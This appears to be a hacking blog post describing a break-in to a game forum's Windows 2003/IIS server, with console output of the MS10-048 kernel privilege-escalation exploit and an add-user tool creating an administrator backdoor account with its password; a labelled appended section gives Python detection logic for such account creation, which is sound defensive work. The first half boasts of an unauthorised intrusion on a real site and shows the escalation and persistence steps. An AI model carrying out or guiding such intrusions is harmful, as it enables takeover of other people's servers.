Today I got into a WoW game forum. The server environment was Win03 x86 + IIS 6.0 + PHP + MySQL.
Privilege escalation was one frustration after another: MySQL had no privileges and there was no root, and the several other methods I tried all failed. With nothing else left, I tried MS10048, and it worked.
Dojibiron by Ronald Huizer, (c) master#h4cker.us
[ ] Trying to allocate a page at NULL.
[+] Allocated page at 0x0000000000000000 for 0x0000000000000001
[ ] Bootstrapping kernel resolver.
    Module ntoskrnl.exe at 0x0000000000BD0000
    Base of driver: 0xFFFFF80001000000
[+] Success.
[ ] Resolving PsReferencePrimaryToken
[+] Success: 0xFFFFF8000129FE50
[ ] Resolving PsInitialSystemProcess
[+] Success: 0xFFFFF800011D1FB0
[ ] Resolving PsLookupProcessByProcessId
[+] Success: 0xFFFFF80001288BC0
[ ] Resolving PsDereferencePrimaryToken
[+] Success: 0xFFFFF80001311B40
[+] Handle table retrieval succeeded.
    Userspace handle table: 0x00000000006B0000
    Kernelspace handle table: 0xFFFFF97FF7990000
    Handle table entries: 1024
[ ] Allocating fake HEAD page.
[+] Allocated page at 0x0000000004000000 for 0x00000000040001FF
[ ] Setting up CBT filter hook.
[+] Success.
[ ] Creating evil window
[+] Success.
[ ] Destroyed handle at: 0xFFFFF97FF7990FC0
    pHead: 0xFFFFF97FF906BA00
    pOwner: 0xFFFFFA80000E8D80
    bType: 0x01 - TYPE_WINDOW
    bFlags: 0x00 -
    wUniq: 0x0004
[ ] Trigger handle at: 0xFFFFF97FF7995AC0
    pHead: 0xFFFFF97FF90900A0
    pOwner: 0xFFFFFA80000E8D80
    bType: 0x01 - TYPE_WINDOW
    bFlags: 0x00 -
    wUniq: 0x0003
[ ] Writing pool addr to: 0xFFFFF97FF7990F7F
~ MS10_048 X64 EXP ~
Need a girl to love
QQ 65665651 email master#h4cker.us
10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
[ ] Checking the success flag.
[+] Set to 2 exploit half succeeded
[ ] Destroying trigger window
    pHead: 0x00000000000003CA
    pOwner: 0x0000000000000000
    bType: 0x00 - TYPE_FREE
    bFlags: 0x00 -
    wUniq: 0x0004
[ ] Spawning half a shell...
    Command: D:\RECYCLER\add.exe
[+] Enjoy!
==========================================
Api Add User Made By Cond0r 2011.3.20
Adduser.exe UserName PassWord Group
==========================================
User List:
--> 7ksf
--> ASPNET
--> Guestasdfa
--> IUSR_NJXW-12-5-2
--> IWAM_NJXW-12-5-2
--> SUPPORT_388945a0
Group List:
--> Administrators
--> Backup Operators
--> Distributed COM Users
--> Guests
--> Network Configuration Operators
--> Performance Log Users
--> Performance Monitor Users
--> Power Users
--> Print Operators
--> Remote Desktop Users
--> Replicator
--> Users
--> HelpServicesGroup
--> IIS_WPG
--> TelnetClients
SuccessFul !!
User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!
Using the API add-user tool, I successfully added the account cond0r with the password 123!@#asdASD.
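From the defender's side, the trace this activity leaves on the host is a local account created by the SYSTEM account and placed straight into a privileged group. The following detection logic is an added example, not code from the post or its author: it parses a constructed plain-text export of Windows Security events (the "<timestamp> <event id> key=value ..." layout is an assumption made for this example, not the format of any real export tool), correlates account creation events (624 on Windows Server 2003, 4720 on later versions) with group membership additions (636 / 4732), and flags accounts that land in a privileged local group shortly after creation. The sample log lines are constructed; the user name and host name are taken from the output above.

```python
"""Detect 'new local account, then privileged group' on Windows hosts.

Added example, not code from the original post or its author. It parses a
constructed plain-text export of Windows Security events; the
"<timestamp> <event id> key=value ..." layout is an assumption made for this
example and does not match any particular export tool.
"""
import re
from datetime import datetime

# Windows Server 2003 logs 624 (User Account Created) and 636 (Security
# Enabled Local Group Member Added); Vista/2008 and later use 4720 and 4732.
ACCOUNT_CREATED = {"624", "4720"}
GROUP_MEMBER_ADDED = {"636", "4732"}
# Local groups whose membership grants broad control of the host.
PRIVILEGED_GROUPS = {"Administrators", "Backup Operators", "Power Users",
                     "Remote Desktop Users"}

# Constructed sample log: one benign account creation by a named admin, and
# one account created by SYSTEM and immediately placed into Administrators.
SAMPLE_LOG = """\
2011-03-20T10:01:02 528 user=IUSR_NJXW-12-5-2 logon_type=5
2011-03-20T10:04:11 624 new_user=Cond0r caller=NT AUTHORITY\\SYSTEM
2011-03-20T10:04:12 636 member=Cond0r group=Administrators caller=NT AUTHORITY\\SYSTEM
2011-03-20T11:00:00 624 new_user=svc_backup caller=NJXW-12-5-2\\admin
2011-03-20T11:00:30 636 member=svc_backup group=Users caller=NJXW-12-5-2\\admin
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(.*)$")
# Values may contain spaces (e.g. "NT AUTHORITY\SYSTEM"), so a value runs
# until the next " key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_events(text):
    """Return a list of (timestamp, event_id, fields) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines rather than failing
        ts, event_id, rest = m.groups()
        fields = {k: v for k, v in FIELD_RE.findall(rest)}
        events.append((datetime.fromisoformat(ts), event_id, fields))
    return events


def find_suspicious_accounts(events, window_seconds=600):
    """Correlate account creation with privileged-group membership.

    Returns one finding per account that was created and then added to a
    privileged local group within `window_seconds`. Creation by the SYSTEM
    account (rather than by a named administrator) is recorded as an extra
    reason, since that is how an add-user tool run from an elevated shell
    typically appears in the log.
    """
    created = {}   # user -> (timestamp, caller)
    findings = []
    for ts, event_id, fields in events:
        if event_id in ACCOUNT_CREATED and "new_user" in fields:
            created[fields["new_user"]] = (ts, fields.get("caller", ""))
        elif event_id in GROUP_MEMBER_ADDED:
            member, group = fields.get("member"), fields.get("group")
            if member not in created or group not in PRIVILEGED_GROUPS:
                continue
            created_ts, caller = created[member]
            delta = (ts - created_ts).total_seconds()
            if 0 <= delta <= window_seconds:
                reasons = [f"added to {group} {delta:.0f}s after creation"]
                if caller.upper().endswith("\\SYSTEM"):
                    reasons.append(f"created by {caller}")
                findings.append({"user": member, "group": group,
                                 "created_by": caller, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_accounts(parse_events(SAMPLE_LOG)):
        print(finding)
```

Run against the sample, the benign svc_backup creation (a named administrator adding an account to Users) produces nothing, while Cond0r is reported with two reasons: membership in Administrators one second after creation, and creation by NT AUTHORITY\SYSTEM. On a real host the same correlation can be fed from the Security event log export of your choice; only parse_events needs adapting to the export format.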